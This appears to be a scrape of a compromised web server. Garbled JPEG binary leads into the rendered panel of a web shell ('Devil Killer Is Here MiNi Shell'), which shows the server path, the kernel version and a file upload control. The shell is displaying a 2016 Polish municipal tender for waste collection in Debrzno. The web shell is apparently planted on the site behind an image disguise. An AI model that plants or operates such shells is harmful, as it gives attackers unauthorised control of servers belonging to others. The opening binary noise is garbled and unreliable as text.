JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20161125/351741-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.bip.debrzno.pl' target='_blank'>www.bip.debrzno.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 351741 - 2016
              z dnia 2016-11-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Debrzno: ODBIÓR STAŁYCH ODPADÓW KOMUNALNYCH 
Z TERENU MIASTA I GMINY DEBRZNO Z NIERUCHOMOŚCI ZAMIESZKAŁYCH I NIEZAMIESZKAŁYCH ORAZ ICH TRANSPORT DO ZAKŁADU ZAGOSPODAROWANIA ODPADÓW NOWY DWÓR SP. Z O. O. W NOWYM DWORZE.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Miasta i Gminy w Debrznie, krajowy numer identyfikacyjny
              53021200000, ul.
              ul. Traugutta 
              2,
              77310  
              Debrzno, woj.
              pomorskie, państwo
              Polska, tel.
              598 335 366, e-mail
              , faks
              598 335 351.
              <br />
              Adres strony internetowej (URL): www.bip.debrzno.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.debrzno.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.debrzno.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />Urząd Miasta i Gminy Debrzno, ul. Traugutta 2, 77-310 Debrzno</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ODBIÓR STAŁYCH ODPADÓW KOMUNALNYCH 
Z TERENU MIASTA I GMINY DEBRZNO Z NIERUCHOMOŚCI ZAMIESZKAŁYCH I NIEZAMIESZKAŁYCH ORAZ ICH TRANSPORT DO ZAKŁADU ZAGOSPODAROWANIA ODPADÓW NOWY DWÓR SP. Z O. O. W NOWYM DWORZE.
<br /><b>Numer referencyjny: </b>RRL.271.2.3.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest usługa polegająca na odbiorze stałych odpadów  komunalnych z terenu Miasta i Gminy Debrzno z nieruchomości zamieszkałych i niezamieszkałych oraz ich transport do zakładu Zagospodarowania Odpadów Nowy Dwór Sp. z o. o. w Nowym Dworze.

Odebrane odpady komunalne należy przekazać do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych, wyznaczonej dla regionu południowo-zachodniego w Wojewódzkim Planie Gospodarki Odpadami dla Województwa Pomorskiego 2018 tj. Zakładu Zagospodarowania Odpadów Nowy Dwór Sp. z o. o. w Nowym Dworze k. Chojnic lub w przypadku jej awarii uniemożliwiającej odbieranie odpadów do instalacji  zastępczej wskazanej w Wojewódzkim Planie Gospodarki Odpadami dla Województwa Pomorskiego.

Kody CPV 
90500000-2       Usługi związane z odpadami  komunalnymi
90514000-3       Usługi recyklingu odpadów
90511000-2       Usługi wywozu odpadów
90512000-9       Usługi transportu odpadów
90513100-7       Usługi wywozu odpadów pochodzących z gospodarstw domowych
90533000-2       Usługi gospodarki odpadami

Charakterystyka gminy
1.	Liczba mieszkańców Miasta i Gminy Debrzno: miasto  5 096 mieszkańców, 
wieś  4 056 mieszkańców, łącznie 9 152 mieszkańców (Stan na dzień 31.12.2015 r.).
2.	Powierzchnia gruntów w gminie ogółem  224,03 km2 (stan na dzień 01.01.2016 r.).
3.	Liczba miejscowości na terenie gminy  34 (stan na dzień 01.01.2016 r.).
4.	Liczba budynków (nieruchomości gruntowej zabudowanej): miasto  1 152 (stan na dzień 01.01.2016 r.).
5.	Liczba budynków (nieruchomość budynkowa): miasto  250 (stan na dzień 01.01.2016 r.).
6.	Liczba budynków mieszkalnych: miasto  462 (stan na dzień 01.01.2016 r.).
7.	Liczba budynków (nieruchomości gruntowej zabudowanej): gmina 2 764 (stan na dzień 01.01.2016 r.).
8.	Liczba budynków (nieruchomość budynkowa): gmina  45 (stan na dzień 01.01.2016 r.).
9.	Liczba budynków mieszkalnych: gmina  814 (stan na dzień 01.01.2016 r.).

1.	Szkoły, w tym liczba uczniów (stan na dzień 01.10.2016 r.) oraz zatrudnieni pracownicy (Załącznik nr 12).
2.	Budynki użyteczności publicznej (Załącznik nr 9).
3.	Liczba nieruchomości zamieszkałych z podziałem na segregację bądź jej brak stanowi (Załącznik nr 11)
4.	Liczba nieruchomości niezamieszkałych z podziałem na segregację bądź jej brak stanowi (Załącznik nr 10)
5.	Szczegółowy wykaz ulic miasta oraz gminy Debrzno wraz z ich usytuowaniem jest dostępny na stronie internetowej http://debrzno.e-mapa.net/
6.	Ilość dostarczonych odpadów w 2015 roku z terenu Miasta i Gminy Debrzno do instalacji w Nowym Dworze:

Rodzaj odebranych odpadów komunalnych	Kod odebranych odpadów komunalnych	Masa odebranych odpadów komunalnych [Mg]
Niesegregowane (zmieszane) odpady komunalne	20 03 01	1.852,82
Opakowania ze szkła	15 01 07	30,17
Odpadowa papa	17 03 80	1,42
Zmieszane odpady opakowaniowe	15 01 06	50,22
Odpady wielkogabarytowe	20 03 07	30,20
Tworzywa sztuczne	17 02 03	0,36
Inne frakcje odebrane w sposób selektywny  zużyte opony	20 01 99	5,68
Inne frakcje odebrane w sposób selektywny - popiół	20 01 99	17,60
Inne frakcje odebrane w sposób selektywny - bio	20 01 99	13,70
Materiały konstrukcyjne zawierające azbest	17 06 05*	0,98
Tworzywa sztuczne	20 01 39	1,26
Odpady z czyszczenia ulic i placów	20 03 03	5,84

Z terenu Miasta i Gminy Debrzno zostały zebrane także:
- zużyte urządzenia zawierające niebezpieczne elementy inne niż wymienione 
w 16 02 09 do 16 02 12 (kod 16 02 13*) w ilości 3,222 Mg,
- zużyte urządzenia inne niż wymienione w 16 02 09 do 16 02 13 (kod 16 02 14) 
w ilości 1,774 Mg.

Podane ilości odpadów nie stanowią podstawy oszacowania wartości zamówienia. Wykonawca zobowiązany jest do odbioru odpadów komunalnych w każdej ilości.

16)	Ilość wytworzonych odpadów komunalnych na terenie gminy Debrzno nie jest zależna od Zamawiającego. Ustalone ilości mogą ulec zmianie stosownie do rzeczywistych ilości wytworzonych odpadów.
17)	Dane dotyczące ilości osób zamieszkałych mogą w niewielkim stopniu ulec zmianie w wyniku oddania nowych budynków do użytkowania bądź ruchu ludności. W związku z czym, Wykonawca przy sporządzaniu oferty winien uwzględnić możliwość wzrostu liczby mieszkańców oraz nowych gospodarstw domowych na okres realizacji umowy. W przypadku zwiększenia ilości punktów odbioru odpadów Wykonawca będzie zobowiązany w ramach ceny ofertowej uwzględnić objęcie nowych nieruchomości, które weszły do systemu, usługą odbioru odpadów.
18)	Zamawiający zaleca, aby Wykonawca zapoznał się z warunkami terenowymi związanymi z realizacją zamówienia, aby na drogach gminnych i powiatowych był użyty właściwy tabor transportowy, nie powodujący niszczenia dróg, a umożliwiający odbiór odpadów komunalnych, kiedy dojazd do nieruchomości zamieszkałych będzie utrudniony (dot. wzmożonych opadów deszczu czy śniegu, prowadzonych robót drogowych, wąskich dróg itp.).
OBOWIĄZKI WYKONAWCY W RAMACH PRZEDMIOTU ZAMÓWIENIA W STOSUNKU DO POSZCZEGÓLNYCH NIERUCHOMOSCI ZAMIESZKAŁYCH I NIEZAMIESZKAŁYCH

1. ZABUDOWA JEDNORODZINNA
Na terenie zabudowy jednorodzinnej oraz wielorodzinnej obowiązywać będzie system mieszany workowo- pojemnikowy zbiórki odpadów komunalnych.

A. Niesegregowane (zmieszane)  odpady komunalne (kod 200301)

Niesegregowane (zmieszane) odpady komunalne gromadzone będą w pojemnikach. Pojemniki do gromadzenia odpadów zapewni Wykonawca. Zapełnione pojemniki właściciel nieruchomości wystawi przed posesję w dniu odbioru.

B. Selektywne zbierane odpady komunalne (kody 200101, 200102, 200108, 200139, 200140, 200201, 200199, 150101, 150102, 150104, 150105, 150107)

Selektywna zbiórka odpadów komunalnych odbywać się będzie w systemie workowych. Worki do gromadzenia odpadów zapewni Wykonawca.
Bezpośrednio z nieruchomości będą odbierane następujące frakcje odpadów selektywnie zebranych:
a) papier, metale, tworzywa sztuczne, opakowania wielomateriałowe  worek w kolorze żółtym;
b) szkło  worek w kolorze zielonym;
c) odpady biodegradowalne, w tym zielone  worek w kolorze brązowym;
d) popiół  worek w kolorze szarym/grafitowym

C. Częstotliwość odbioru i wywozu przez Wykonawcę odpadów:
a) Niesegregowane (zmieszane) odpady komunalne (kod 200301)
1.Niesegregowane (zmieszane)  co dwa tygodnie.

b) Bezpośrednio z nieruchomości będą odbierane następujące frakcję odpadów selektywnie zebranych (kody 200101, 200102, 200108, 200139, 200140, 200201, 150101, 150102, 150104, 150105, 150107, 200199):
a) papier, metale, tworzywa sztuczne, opakowania wielomateriałowe  jeden raz w miesiącu;
b) odpady biodegradowalne, w tym zielone   w okresie od kwietnia do października raz na dwa tygodnie, w okresie od listopada do marca jeden raz w miesiącu;
c) popiół  jeden raz w miesiącu w okresie październik  kwiecień, jeden raz na dwa miesiące w okresie maj  wrzesień;
d) szkło  jeden raz w miesiącu.

D. Wykaz urządzeń do gromadzenia odpadów:
1)	Niesegregowane (zmieszane) odpady komunalne (kod 200301)
Niesegregowane (zmieszane) odpady komunalne będą gromadzone w pojemnikach z tworzywa lub metalu 110 l, 120 l, 240 l, 1100 l, 7m3, 8 m3.

2)	Selektywnie zebrane odpady komunalne (kody 200101, 200102, 200108, 200139, 200140, 200201, 150101, 150102, 150104, 105105, 1050107, 200199).
Selektywnie zebrane odpady komunalne zebrane będą w workach:
	materiał  folia polietylenowa LDPE,
	pojemność  60-120l,
	kolor  zielony, żółty, brązowy, szary/grafitowym.
	grubość  worek żółty  grubość nie mniejsza niż 60 mikronów, worek zielony, brązowy -  grubość nie mniejsza niż 70 mikronów, worek szary/grafitowy  grubość nie mniejsza niż 90 mikronów. Grubość zapewniająca szczelne, bezpieczne zbieranie i przechowywanie odpadów, nadruk z informacją na jaki rodzaj odpadów są przeznaczone.

2. ZABUDOWA WIELORODZINNA (SPÓŁDZIELNIE, WSPÓLNOTY)

Na terenie zabudowy obowiązywać będzie system mieszany workowo - pojemnikowy zbiórki odpadów komunalnych.

A. Niesegregowane (zmieszane) odpady komunalne (kod 200301)

Niesegregowane (zmieszane) odpady komunalne będą gromadzone w pojemnikach. Pojemniki do gromadzenia odpadów zapewni Wykonawca. Zapełnione pojemniki właściciel nieruchomości wystawi przed posesję w dniu odbioru.

B. Selektywne zbierane odpady komunalne (kody 200101, 200102, 200108, 200139, 200140, 200201, 150101, 150102, 150104, 150105, 150107)

Selektywna zbiórka odpadów komunalnych odbywać się będzie w systemie pojemnikowo  workowych. Pojemniki oraz worki do gromadzenia odpadów zapewni Wykonawca. Bezpośrednio z nieruchomości będą odbierane następujące frakcje odpadów selektywnie zebranych.
Wprowadza się cztery rodzaje worków:
a) papier, metal, tworzywa sztuczne, opakowania materiałowe  worek w kolorze żółtym;
b) popiół - worek w kolorze szarym/grafitowym;
c) szkło  worek w kolorze zielonym;
d) odpady biodegradowalne, w tym zielone  worek w kolorze brązowym.

Wprowadza się cztery rodzaje pojemników:
a) pojemnik żółty z napisem PAPIER, METALE, TWORZYWA SZTUCZNE, OPAKOWANIA WIELOMATERIAŁOWE do gromadzenia papieru, tworzyw sztucznych, metali i opakowań wielomateriałowych;
b) pojemnik brązowy z napisem ODPADY ZIELONE do gromadzenia odpadów biodegradowalnych, w tym zielonych;
c) pojemnik zielony z napisem SZKŁO do gromadzenia odpadów ze szkła;
d) pojemnik szary/grafitowy z napisem POPIÓŁ do gromadzenia popiołu.

2.	Częstotliwość odbioru i wywozu przez Wykonawcę odpadów.
A). Niesegregowane (zmieszane)  dwa razy w tygodniu.

B) Bezpośrednio z nieruchomości będą odbierane następujące frakcje selektywnie zebranych odpadów komunalnych (kody 200101, 200102, 200108, 200139, 200140, 200201, 150101, 150102, 150104, 150105, 150107, 200199):
a) papier, metale, tworzywa sztuczne i opakowania wielomateriałowe  dwa razy w tygodniu;
b) odpady biodegradowalne, w tym zielone  jeden raz na tydzień;
c) popiół  jeden raz w miesiącu w okresie październik- kwiecień, jeden raz na dwa miesiące w okresie maj- wrzesień;
d) szkło  jeden raz na dwa tygodnie.

C) Wykaz urządzeń do gromadzenia odpadów:
A) Niesegregowane (zmieszane) odpady komunalne  (kod 200301).
Niesegregowane (zmieszane) odpady komunalne będą gromadzone w pojemnikach z tworzywa sztucznego lub metalu 110l, 120l, 240l, 1100l, 7 m3, 8m3.

B) Selektywnie zbierane odpady komunalne  (kody 200101, 200102, 200108, 200139, 200140, 200201, 150101, 150102, 150104, 150105, 150107,200199).
Selektywnie zbierane odpady komunalne zbierane będą w workach:
	materiał folia polietylenowa LDPE,
	pojemność 60-120 l,
	kolor żółty, zielony, brązowy, szarny/grafitowy,
	grubość- worek żółty grubość nie mniejsza niż 60 mikronów, worek zielony, brązowy- grubość nie mniejsza niż 70 mikronów, worek szarny/grafitowy- grubość nie mniejsza niż 90 mikronów. Grubość zapewniająca szczelne, bezpieczne zbieranie i przechowywanie odpadów, nadruk z informacją na jaki rodzaj odpadów są przeznaczone.

3. NIERUCHOMOŚCI NIEZAMIESZKAŁE

Na terenie nieruchomości niezamieszkałych obowiązywać będzie system mieszany workowo- pojemnikowy zbiórki  odpadów komunalnych. Worki oraz pojemniki zapewnia Wykonawca.
W ramach zadania Wykonawca zobowiązany jest do odbioru i wywozu całej ilości odpadów komunalnych.
Szacunkową liczbę nieruchomości niezamieszkałych, z których będą odbierane odpady komunalne  zawiera Załącznik Nr 11 do SIWZ.

A) Niesegregowane (zmieszane) odpady komunalne (kod 200301).
Niesegregowane (zmieszane) odpady komunalne będą gromadzone w pojemnikach. Pojemniki zapewni Wykonawca. Pojemniki zabezpieczają właściciele nieruchomości. Zapełnione pojemniki właściciel nieruchomości wystawi przed posesję w dniu odbioru.

B) Selektywnie zbierane odpady komunalne  (kody 200101, 200102, 200108, 200139, 200140, 200201, 150101, 150102, 150104, 150105, 150107, 200199).
Selektywna zbiórka odpadów komunalnych będzie odbywać się w systemie workowo-pojemnikowym.

Wprowadza się cztery rodzaje worków:
- papier, metal, tworzywa sztuczne, opakowania wielomateriałowe  worek w kolorze żółtym,
- odpady biodegradowalne, w tym zielone- worek w kolorze brązowym,
- popiół- worek w kolorze szarym/grafitowym,
- szkło  worek w kolorze zielonym.

Wprowadza się cztery rodzaje pojemników:
- pojemnik żółty z napisem PAPIER, METALE, TWORZYWA SZTUCZNE, OPAKOWANIA WIELOMATERIAŁOWE do gromadzenia papieru, metalu, tworzywa sztucznego i opakowań wielomateriałowych,
- pojemnik brązowy z napisem ODPADY ZIELONE do gromadzenia odpadów biodegradowalnych, w tym zielonych,
- pojemnik zielony z napisem SZKŁO do gromadzenia odpadów ze szkła,
- pojemnik szary/grafitowy z napisem POPIÓŁ do gromadzenia popiołu.

C) Częstotliwość odbioru i wywozu przez Wykonawcę odpadów komunalnych
a) niesegregowane (zmieszane) odpady komunalne (kod 200301)
Niesegregowane (zmieszane) odpady komunalne  co najmniej jeden raz na dwa tygodnie.
b) Selektywnie zbierane odpady komunalne (kody 200101, 200102, 200108, 200139, 200140, 200201, 150101, 150102, 150104, 150105, 150107, 200199):
- papier, metale, tworzywa sztuczne, opakowania wielomateriałowe   jeden raz  w miesiącu (Harmonogram odbioru opracowany przez Wykonawcę),
- odpady biodegradowalne, w tym zielone  jeden raz w miesiącu w okresie kwiecień-wrzesień, jeden raz na dwa miesiące w okresie październik-marzec (Harmonogram odbioru opracowany przez Wykonawcę),
- popiół -jeden raz w miesiącu w okresie październik- kwiecień, jeden raz na dwa miesiące w okresie maj- wrzesień (Harmonogram odbioru opracowany przez Wykonawcę),
- szkło  co najmniej jeden raz w miesiącu (Harmonogram odbioru opracowany przez Wykonawcę).

Odbiór odpadów może ulec zmianie po opracowaniu harmonogramu wywozu przez Wykonawcę.
Wykonawca zobowiązany jest także do opróżniania koszy ulicznych, placów zabaw oraz cmentarzy na podstawie opracowanego harmonogramu.

3. Wykaz urządzeń do gromadzenia odpadów:
A) Niesegregowane (zmieszane) odpady komunalne (kod 200301).
Niesegregowane (zmieszane) odpady komunalne będą gromadzone w pojemnikach z tworzywa sztucznego lub metalu 110l, 120l, 240l, 1100l, 7 m3, 8m3. Pojemniki zapewnia Wykonawca.

B) Selektywnie zbierane odpady komunalne (kody 200101, 200102, 200108, 200139, 200140, 200201, 150101, 150102, 150104, 150105, 150107,200199).
Selektywnie zbierane odpady komunalne zbierane będą w workach:
- materiał folia polietylenowa LDPE,
- pojemność 60-120 l,
- kolor żółty, zielony, brązowy, szary/grafitowy,
- grubość- worek żółty- grubość nie mniejsza niż 60 mikronów, worek zielony, brązowy  grubość  nie mniejsza niż 70 mikronów, worek szary/grafitowy  grubość nie mniejsza niż 90 mikronów. Grubość zapewniająca szczelne, bezpieczne zbieranie i przechowywanie odpadów, nadruk z informacją na jaki rodzaj odpadów są przeznaczone.

4.	Częstotliwość odbioru odpadów z cmentarzy komunalnych oraz pojemność określonych pojemników:

Lp	Miejscowość	Ilość pojemników	Pojemność pojemnika	Częstotliwość odbioru
1	Stare Gronowo	4	1100 l	Co 2 tygodnie
2	Cierznie	2	1100 l	Co 2 tygodnie
3	Uniechów	2	1100 l	Co 2 tygodnie
4	Prusinowo	2	1100 l	Co 2 tygodnie
5	Słupia	2	1100 l	Co 2 tygodnie
6	Strzeczona	2	1100 l	Co 2 tygodnie
7	Debrzno	10	1100 l	1 raz w tygodniu

Przy określeniu częstotliwości odbioru po za wyznaczonym harmonogramem należy uwzględnić dodatkowe odbiory w okresach świątecznych (Boże Narodzenie, Wszystkich Świętych).

5. Do obowiązków w ramach przedmiotu zamówienia w stosunku do wszystkich nieruchomości objętych systemem (nieruchomości zamieszkałe i niezamieszkałe) należy jednorazowa zbiórka świątecznych drzewek z terenu miasta Debrzno (data zbiórki ustalona z Zamawiającym)

6. Do obowiązków w ramach przedmiotu zamówienia w stosunku do wszystkich nieruchomości objętych systemem (nieruchomości zamieszkałe i niezamieszkałe) należy także naklejanie żółtych oraz czerwonych kartek w celu egzekwowania poprawnej segregacji (kartki zapewni Zamawiający).

7. Do obowiązków w ramach przedmiotu zamówienia w stosunku do wszystkich nieruchomości objętych systemem (nieruchomości zamieszkałe i niezamieszkałe) należy również odbiór:
- mebli i innych odpadów wielkogabarytowych (kod 200307), zużyty sprzęt elektryczny i elektroniczny (200135*, 200136), zużyte opony (1601013) odbierane są od właścicieli nieruchomości wystawionych przed posesję lub przy pergolach śmietnikowych w terminach określonych.
Częstotliwość pozbywania się odpadów z terenu nieruchomości określa się na: termin 3 razy w roku  zgodnie z ustalonym harmonogramem z Zamawiającym.

- zużyte baterie i akumulatory (kody: 20 01 33*, 20 01 34), oraz pozostałe odpady niebezpieczne, w szczególności:
a) chemikalia (farby, rozpuszczalniki, oleje odpadowe itp.)
b) lampy fluorescencyjne (świetlówki), zużyte żarówki energooszczędne,
c) opakowania zawierające substancje niebezpieczne (np. pojemniki po lakierach, aerozolach, tonerach itp.),
